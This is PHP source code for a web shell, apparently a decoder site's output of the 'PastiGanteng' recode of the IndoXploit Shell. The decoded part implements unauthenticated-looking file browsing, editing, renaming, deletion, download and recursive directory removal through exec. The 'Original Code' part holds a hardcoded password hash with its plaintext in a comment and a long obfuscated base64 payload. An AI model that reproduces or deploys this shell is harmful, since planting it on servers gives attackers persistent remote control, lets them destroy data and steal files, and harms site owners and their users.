@exe("rmdir /s /q $dir");
$act = "<script>window.location='?dir=".dirname($dir)."';</script>";
} else {
$act = "<font color=red>could not remove ".basename($dir)."</font>";
}
}
echo $act;
} elseif($_GET['act'] == 'view') {
echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
} elseif($_GET['act'] == 'edit') {
if($_POST['save']) {
$save = file_put_contents($_GET['file'], $_POST['src']);
if($save) {
$act = "<font color=lime>Saved!</font>";
} else {
$act = "<font color=red>permission denied</font>";
}
echo "".$act."<br>";
}
echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
echo "<form method='post'>
<textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
<input type='submit' value='Save' name='save' style='width: 500px;'>
</form>";
} elseif($_GET['act'] == 'rename') {
if($_POST['do_rename']) {
$rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
if($rename) {
$act = "<script>window.location='?dir=".$dir."';</script>";
} else {
$act = "<font color=red>permission denied</font>";
}
echo "".$act."<br>";
}
echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
echo "<form method='post'>
<input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
<input type='submit' name='do_rename' value='rename'>
</form>";
} elseif($_GET['act'] == 'delete') {
$delete = unlink($_GET['file']);
if($delete) {
$act = "<script>window.location='?dir=".$dir."';</script>";
} else {
$act = "<font color=red>permission denied</font>";
}
echo $act;
} else {
if(is_dir($dir) === true) {
if(!is_readable($dir)) {
echo "<font color=red>can't open directory. ( not readable )</font>";
} else {
echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
<tr>
<th class="th_home"><center>Name</center></th>
<th class="th_home"><center>Type</center></th>
<th class="th_home"><center>Size</center></th>
<th class="th_home"><center>Last Modified</center></th>
<th class="th_home"><center>Owner/Group</center></th>
<th class="th_home"><center>Permission</center></th>
<th class="th_home"><center>Action</center></th>
</tr>';
$scandir = scandir($dir);
foreach($scandir as $dirx) {
$dtype = filetype("$dir/$dirx");
$dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
if(function_exists('posix_getpwuid')) {
$downer = @posix_getpwuid(fileowner("$dir/$dirx"));
$downer = $downer['name'];
} else {
//$downer = $uid;
$downer = fileowner("$dir/$dirx");
}
if(function_exists('posix_getgrgid')) {
$dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
$dgrp = $dgrp['name'];
} else {
$dgrp = filegroup("$dir/$dirx");
}
if(!is_dir("$dir/$dirx")) continue;
if($dirx === '..') {
$href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
} elseif($dirx === '.') {
$href = "<a href='?dir=$dir'>$dirx</a>";
} else {
$href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
}
if($dirx === '.' || $dirx === '..') {
$act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
} else {
$act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
}
echo "<tr>";
echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
echo "<td class='td_home'><center>$dtype</center></td>";
echo "<td class='td_home'><center>-</center></th></td>";
echo "<td class='td_home'><center>$dtime</center></td>";
echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
echo "</tr>";
}
}
} else {
echo "<font color=red>can't open directory.</font>";
}
foreach($scandir as $file) {
$ftype = filetype("$dir/$file");
$ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
$size = filesize("$dir/$file")/1024;
$size = round($size,3);
if(function_exists('posix_getpwuid')) {
$fowner = @posix_getpwuid(fileowner("$dir/$file"));
$fowner = $fowner['name'];
} else {
//$downer = $uid;
$fowner = fileowner("$dir/$file");
}
if(function_exists('posix_getgrgid')) {
$fgrp = @posix_getgrgid(filegroup("$dir/$file"));
$fgrp = $fgrp['name'];
} else {
$fgrp = filegroup("$dir/$file");
}
if($size > 1024) {
$size = round($size/1024,2). 'MB';
} else {
$size = $size. 'KB';
}
if(!is_file("$dir/$file")) continue;
echo "<tr>";
echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
echo "<td class='td_home'><center>$ftype</center></td>";
echo "<td class='td_home'><center>$size</center></td>";
echo "<td class='td_home'><center>$ftime</center></td>";
echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
echo "</tr>";
}
echo "</table>";
if(!is_readable($dir)) {
//
} else {
echo "<hr>";
}
echo "<center>Copyright © ".date("Y")." - <font color=lime>Security Cyber Art</font> - IndoXploit Shell Recoded by <font color=lime>Xmall75</font></center>";
}
?>
</html>Did this file decode correctly?
Original Code
<?php
// Xmall75 - Security Cyber Art
// PastiGanteng V.1 Shell
// Remake and Recode from IndoXploit Shell
// Thanks to IndoXploit, XaiSyndicate, GantengersCrew, GarudaSecurityHacker, PhantomGhost, N45HT, and others.
$auth_pass = "dacffae94acdb77294f2033ce4f23ead"; // password : PastiGanteng
$pastiganteng = "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